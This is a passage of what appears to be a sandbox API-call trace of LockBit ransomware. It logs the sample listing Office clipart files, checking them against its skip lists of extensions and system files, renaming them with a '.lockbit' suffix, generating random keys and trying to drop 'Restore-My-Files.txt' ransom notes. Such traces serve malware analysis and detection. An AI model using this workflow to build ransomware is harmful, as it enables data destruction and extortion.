lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c84900, ftCreationTime.dwHighDateTime=0x1bd4b22, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd0c84900, ftLastWriteTime.dwHighDateTime=0x1bd4b22, nFileSizeHigh=0x0, nFileSizeLow=0x402, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00235_.WMF", cAlternateFileName="")) returned 1 [0117.677] lstrcmpiW (lpString1=".", lpString2="HH00235_.WMF") returned -1 [0117.677] lstrcmpiW (lpString1="..", lpString2="HH00235_.WMF") returned -1 [0117.677] PathFindExtensionW (pszPath="HH00235_.WMF") returned=".WMF" [0117.677] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.677] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.678] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.678] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00235_.WMF") returned 1 [0117.679] lstrcmpiW (lpString1="ntldr", lpString2="HH00235_.WMF") returned 1 [0117.679] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00235_.WMF") returned 1 [0117.679] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00235_.WMF") returned -1 [0117.679] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00235_.WMF") returned -1 [0117.679] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00235_.WMF") returned 1 [0117.679] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00235_.WMF") returned 1 [0117.679] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.679] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned=".WMF" [0117.679] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.679] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.679] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.680] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.680] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.lockbit") returned 72 [0117.680] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0117.681] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.681] malloc (_Size=0x40068) returned 0x1ff1e60 [0117.681] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1026) returned 1 [0117.681] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.682] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0117.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.682] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0117.682] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.684] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.684] malloc (_Size=0xa6) returned 0x77d7a8 [0117.684] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.685] free (_Block=0x77d7a8) [0117.685] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.685] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.685] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.686] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf971c00, ftCreationTime.dwHighDateTime=0x1bd4b22, ftLastAccessTime.dwLowDateTime=0x5386f090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcf971c00, ftLastWriteTime.dwHighDateTime=0x1bd4b22, nFileSizeHigh=0x0, nFileSizeLow=0xcd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00236_.WMF", cAlternateFileName="")) returned 1 [0117.686] lstrcmpiW (lpString1=".", lpString2="HH00236_.WMF") returned -1 [0117.686] lstrcmpiW (lpString1="..", lpString2="HH00236_.WMF") returned -1 [0117.686] PathFindExtensionW (pszPath="HH00236_.WMF") returned=".WMF" [0117.686] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.686] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.687] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.687] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00236_.WMF") returned 1 [0117.688] lstrcmpiW (lpString1="ntldr", lpString2="HH00236_.WMF") returned 1 [0117.688] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00236_.WMF") returned 1 [0117.688] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00236_.WMF") returned -1 [0117.688] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00236_.WMF") returned -1 [0117.688] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00236_.WMF") returned 1 [0117.688] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00236_.WMF") returned 1 [0117.688] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.688] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned=".WMF" [0117.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.688] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.688] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.689] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.690] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF.lockbit") returned 72 [0117.690] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0117.690] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.690] malloc (_Size=0x40068) returned 0x3e70008 [0117.690] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3286) returned 1 [0117.690] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0117.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.692] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0117.692] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.696] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.696] malloc (_Size=0xa6) returned 0x77d7a8 [0117.696] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.697] free (_Block=0x77d7a8) [0117.697] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.697] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.697] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.697] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cd54400, ftCreationTime.dwHighDateTime=0x1bd4b22, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8cd54400, ftLastWriteTime.dwHighDateTime=0x1bd4b22, nFileSizeHigh=0x0, nFileSizeLow=0x7a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00241_.WMF", cAlternateFileName="")) returned 1 [0117.697] lstrcmpiW (lpString1=".", lpString2="HH00241_.WMF") returned -1 [0117.697] lstrcmpiW (lpString1="..", lpString2="HH00241_.WMF") returned -1 [0117.697] PathFindExtensionW (pszPath="HH00241_.WMF") returned=".WMF" [0117.697] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.697] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.697] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.697] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.697] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.697] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.697] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.697] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.698] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.698] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.699] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00241_.WMF") returned 1 [0117.699] lstrcmpiW (lpString1="ntldr", lpString2="HH00241_.WMF") returned 1 [0117.699] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00241_.WMF") returned 1 [0117.699] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00241_.WMF") returned -1 [0117.699] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00241_.WMF") returned -1 [0117.700] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00241_.WMF") returned 1 [0117.700] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00241_.WMF") returned 1 [0117.700] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.700] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned=".WMF" [0117.700] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.700] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.700] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 